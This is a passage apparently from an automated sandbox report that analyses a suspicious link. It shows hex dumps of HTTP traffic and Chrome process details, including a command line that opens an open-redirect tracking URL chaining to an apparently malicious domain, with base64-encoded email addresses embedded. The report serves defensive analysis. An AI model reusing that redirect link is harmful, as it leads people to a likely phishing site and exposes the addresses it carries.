                                                      2024-04-16 11:57:18 UTC16384INData Raw: 7c 53 a5 ec ae 01 f4 30 c8 3f e7 de 9d 4f bc 4f b0 ef f0 f3 a6 ca 7e cd ce d0 ff 00 82 5e b8 8d f9 d7 85 1a 4f f4 9d d5 5e 34 1a 99 cf 6b 75 c8 55 04 80 0b 31 ca 58 72 40 e4 fb a4 9b 0e ed 0c 66 49 6d 66 55 1c 49 89 c0 1e 59 25 7d 4f 57 1f 78 5f 63 4b 05 1c e1 b3 92 70 00 dc 6d 89 3f 97 89 d2 9e 39 22 9a 28 2a 29 aa a9 2a e9 6a e9 a9 ab 28 eb 28 6a e9 ab e8 6b 68 ab 20 5a 9a 3a da 1a fa 17 92 19 e1 9a 37 59 22 9a 19 19 1d 48 65 62 08 3e cb da 02 8c 51 c1 04 71 1d 49 db 66 f5 b6 ef 5b 7c 3b b6 d1 70 97 56 b7 08 24 8a 68 9c 3c 72 23 65 5d 1d 49 56 53 e4 41 20 f5 cb 9f f5 43 fd e7 de bc 25 ff 00 57 fc 57 4b bc 71 fe a3 d7 b9 ff 00 54 3f de 7d fb c2 5f f5 7f c5 75 ef 1c 7f a8 f5 ee 7f d5 0f f7 9f 7e f0 97 fd 5f f1 5d 7b c7 1f ea 3d 7b 9f f5 43 fd e7 df bc 25
                                                      Data Ascii: |S0?OO~^O^4kuU1Xr@fImfUIY%}OWx_cKpm?9"(*)*j((jkh Z:7Y"Heb>QqIf[|;pV$h<r#e]IVSA C%WWKqT?}_u~_]{={C%
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 0e 10 af 88 d5 c1 5a 37 f6 60 8c 71 38 3c 78 74 c5 f1 ae a3 e5 d7 67 f5 4e da c0 e2 37 76 d7 e9 ec 46 c0 39 5e 9c c8 50 ec ed a2 9d bd db b4 f9 5e a6 c9 3e c4 ab 6d cb da 9d 94 94 9b 7e 2a ea 88 a8 e1 ac 32 50 6c d6 1e 39 a3 70 5f 50 f6 de e7 6f 67 6d 70 67 dd a4 51 24 80 49 a6 32 74 51 f2 28 cc 35 37 db a1 73 ea 33 d2 9d a6 f2 ee ee dc 41 b2 42 e6 38 d8 a0 69 40 d5 da 72 0a 46 da 54 1a 8c 19 98 85 a7 03 80 65 a8 7f 97 94 5b fe 68 2a fb 83 2f bf fb 9a ac 05 91 87 74 76 3e e9 df 18 ab 82 59 da 2e b8 c4 c9 8c da 90 a9 b9 2d 1c 78 30 9f 8d 36 f6 49 2f 32 ed 36 98 b6 88 12 31 52 2b ff 00 1e d5 c7 ce 82 9f 2e 8f a0 e5 8d fa f0 56 e6 62 8a 68 7b 68 bc 38 65 34 9c 79 55 89 f5 27 8f 4a 9e c7 f8 a3 d2 58 2e a8 de 5d 45 43 b8 7a ff 00 ae e7 dd 1b 4b 31 82 c6 e1 36
                                                      Data Ascii: Z7`q8<xtgN7vF9^P^>m~*2Pl9p_PogmpgQ$I2tQ(57s3AB8i@rFTe[h*/tv>Y.-x06I/261R+.Vbh{h8e4yU'JX.]ECzK16
                                                      2024-04-16 11:57:18 UTC16384INData Raw: c4 3e 25 c5 ec ce b6 db 85 ed ba 8c cc f3 b8 d1 b1 6c a2 83 44 8c ab 3c eb 41 6b 11 73 e2 b7 1a 6d be b2 6e 0d b3 59 91 a6 86 bd 72 9b d1 b6 6e e2 97 36 b5 9b be 9a ab 37 9d c0 d5 63 a9 f0 5b e7 3b b6 1d 2a 37 56 62 37 31 08 f6 36 d7 8c 61 b1 ea 16 9e b6 4b b3 30 3f 16 44 ee 16 f7 17 8a 1b c4 b8 30 4f e2 9f 1c 34 92 c3 24 62 3b d9 e3 a1 be b8 07 48 1b 5d 88 5d be d8 76 4c c4 e4 06 e4 dd 5b f7 55 ed a5 93 b4 66 1b 31 77 6e b0 69 b4 65 86 19 e2 90 cf 63 05 ca b2 6d 96 8c ba eb bd 6e 6c 77 2b c2 4c b6 a9 80 0b a7 56 ec 4d d3 b2 37 ae 63 68 f5 56 19 37 16 df cd e3 9a 97 7d 26 e4 cc c3 86 8f 60 55 aa 1d 3b 6f 7a ee 5d 9d 07 91 63 ab a8 79 2b 32 3b 2b 6d e4 95 cc 5e 2a 4a ea 9b a3 37 bb 72 fe c5 b8 ec 9b b4 9b 27 27 c0 27 82 55 22 e5 a5 91 63 4b 26 a5 44 53 4b
                                                      Data Ascii: >%lD<AksmnYrn67c[;*7Vb716aK0?D0O4$b;H]]vL[Uf1wniecmnlw+LVM7chV7}&`U;oz]cy+2;+m^*J7r'''U"cK&DSK
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 44 2a a0 34 74 69 1c eb a1 e8 65 ef 5c 8d 16 67 b6 f7 b6 63 1b 90 83 2b 8e cb d7 d0 e5 71 f9 3a 6a dd 87 5f 4f 91 a0 c8 e1 29 6b 28 ab 62 ad ea fa 7a 4d b7 20 92 27 57 d5 81 a5 86 83 9b 53 46 91 05 50 39 b0 b5 55 b4 45 45 01 45 68 02 ba 80 2a 69 41 21 67 03 d0 39 2d ea 49 eb ad 5e ce de 13 ed 47 2e 92 4b 1f dd f6 d5 24 82 6b e1 8a d4 a8 0a 4d 78 90 00 af 00 3a 09 7f e4 2f f7 91 ff 00 14 f6 af e9 cf a7 f2 ea 48 fa b3 d7 bf e4 2f f7 91 ff 00 14 f7 ef a7 3e 9f cb af 7d 59 eb df f2 17 fb c8 ff 00 8a 7b f7 d3 9f 4f e5 d7 be ac f5 ef f9 0b fd e4 7f c5 3d fb e9 cf a7 f2 eb df 56 7a f7 fc 85 fe f2 3f e2 9e fd f4 e7 d3 f9 75 ef ab 3d 7b fe 42 ff 00 79 1f f1 4f 7e fa 73 e9 fc ba f7 d5 9e bd ff 00 21 7f bc 8f f8 a7 bf 7d 39 f4 fe 5d 7b ea cf 5e ff 00 90 bf de 47 fc
                                                      Data Ascii: D*4tie\gc+q:j_O)k(bzM 'WSFP9UEEEh*iA!g9-I^G.K$kMx:/H/>}Y{O=Vz?u={ByO~s!}9]{^G
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 54 ff 00 51 fe df df bf 79 0f 53 d7 be 87 e5 fe af d9 d7 bf 8a 9f ea 3f db fb f7 ef 21 ea 7a f7 d0 fc bf d5 fb 3a f7 f1 53 fd 47 fb 7f 7e fd e4 3d 4f 5e fa 1f 97 fa bf 67 5e fe 2a 7f a8 ff 00 6f ef df bc 87 a9 eb df 43 f2 ff 00 57 ec eb df c5 4f f5 1f ed fd fb f7 90 f5 3d 7b e8 7e 5f ea fd 9d 7b f8 a9 fe a3 fd bf bf 7e f2 1e a7 af 7d 0f cb fd 5f b3 af 7f 15 3f d4 7f b7 f7 ef de 43 d4 f5 ef a1 f9 7f ab f6 75 ef e2 a7 fa 8f f6 fe fd fb c8 7a 9e bd f4 3f 2f f5 7e ce bd fc 54 ff 00 51 fe df df bf 79 0f 53 d7 be 87 e5 fe af d9 d7 bf 8a 9f ea 3f db fb f7 ef 21 ea 7a f7 d0 fc bf d5 fb 3a f7 f1 53 fd 47 fb 7f 7e fd e4 3d 4f 5e fa 1f 97 fa bf 67 5e fe 2a 7f a8 ff 00 6f ef df bc 87 a9 eb df 43 f2 ff 00 57 ec eb df c5 4f f5 1f ed fd fb f7 90 f5 3d 7b e8 7e 5f ea fd
                                                      Data Ascii: TQyS?!z:SG~=O^g^*oCWO={~_{~}_?Cuz?/~TQyS?!z:SG~=O^g^*oCWO={~_
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 82 dc c4 3c 59 0e 84 fe 26 21 45 7e d6 20 7c f0 4d 7a e4 45 cd d2 49 fa 29 fa 92 71 d2 a0 b3 53 d4 aa 82 7e 5c 3e d2 3a ae ff 00 95 3b 87 0b d3 7d b3 f1 f3 bd 37 f7 66 75 17 4a 65 3a 67 b1 e9 b3 99 dd bd d9 3b f3 18 9d 91 9d eb fd d9 8b 9b 63 ef bc 3e 33 a9 b6 79 c9 ee 19 64 96 82 a5 2a 52 39 e8 a2 bc b0 20 01 9e c3 db d7 9b de c1 16 de 6d 2e 2e 03 3a b5 46 90 c4 69 64 64 61 5a 55 89 25 4a 85 56 05 94 64 74 9b 6d e5 fe 68 97 77 6d c2 de d0 ac 32 c3 e1 9d 74 0c 65 8e 58 e5 89 b4 d4 85 55 54 90 48 ce c8 42 39 21 4e 7a 32 3b 8b f9 93 60 56 98 53 f5 7f 45 f6 be f7 72 88 28 f7 47 69 64 30 1f 1c 36 2d 41 6b 68 a8 8e 8f 73 ff 00 14 dd f5 11 15 21 87 8b 6d 44 5c 5b 4b 8b df d9 75 af 28 73 16 e0 da a1 b4 30 a9 fc 53 9f 0e 9f ed 28 d2 8f b1 a3 5e 97 6e 3e e2 72 56
                                                      Data Ascii: <Y&!E~ |MzEI)qS~\>:;}7fuJe:g;c>3yd*R9 m..:FiddaZU%JVdtmhwm2teXUTHB9!Nz2;`VSEr(Gid06-Akhs!mD\[Ku(s0S(^n>rV
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 39 99 30 98 aa ec ed 3c d2 41 4c 6a a5 96 a0 c5 19 00 c8 ec c6 e4 fb c8 df 66 4c b6 bb 05 ec 48 74 89 27 ee 1e a3 c3 8f fc dd 70 db fb d3 a2 53 ef 17 2d b1 e2 36 55 a7 fd 97 df 0f f0 7a f5 71 14 3f c9 a7 f9 4f e3 66 fb 8a 0f e5 d7 f0 f6 96 a3 49 41 3c 5d 0f d7 e2 54 56 16 6f 1c 86 8a ea 7f c5 48 3e e6 4b 3b fb cd be 5f 1e ca 46 89 e9 4d 4a 68 69 f2 3c 47 e5 d7 2f ae ad 2d af 63 f0 6e 90 48 95 ae 93 c0 fd a3 81 fb 0d 47 52 b1 df c9 db f9 55 62 72 0b 96 c7 ff 00 2f 3f 88 74 f9 34 62 e9 5f fe 82 b6 04 b5 6b 21 e4 c8 b3 cd 44 cc 1b fd a8 1b fb 7e d7 78 dd 2c af 3f 78 da ce eb 39 ff 00 44 d4 4b ff 00 bd 1a 9f e7 d3 37 9b 5e dd 7f 66 76 fb b8 55 e0 22 86 3a 51 08 f4 d2 28 29 f2 e1 d2 f5 bf 96 4f f2 f3 65 0a df 0b 7e 36 32 81 a4 29 ea 4d 9e 55 45 ad 65 1f 6b c0
                                                      Data Ascii: 90<ALjfLHt'pS-6Uzq?OfIA<]TVoH>K;_FMJhi<G/-cnHGRUbr/?t4b_k!D~x,?x9DK7^fvU":Q()Oe~62)MUEek


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:13:56:22
                                                      Start date:16/04/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:13:56:24
                                                      Start date:16/04/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2540,i,10552630930107338584,18205451540120361499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:13:56:27
                                                      Start date:16/04/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20="
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly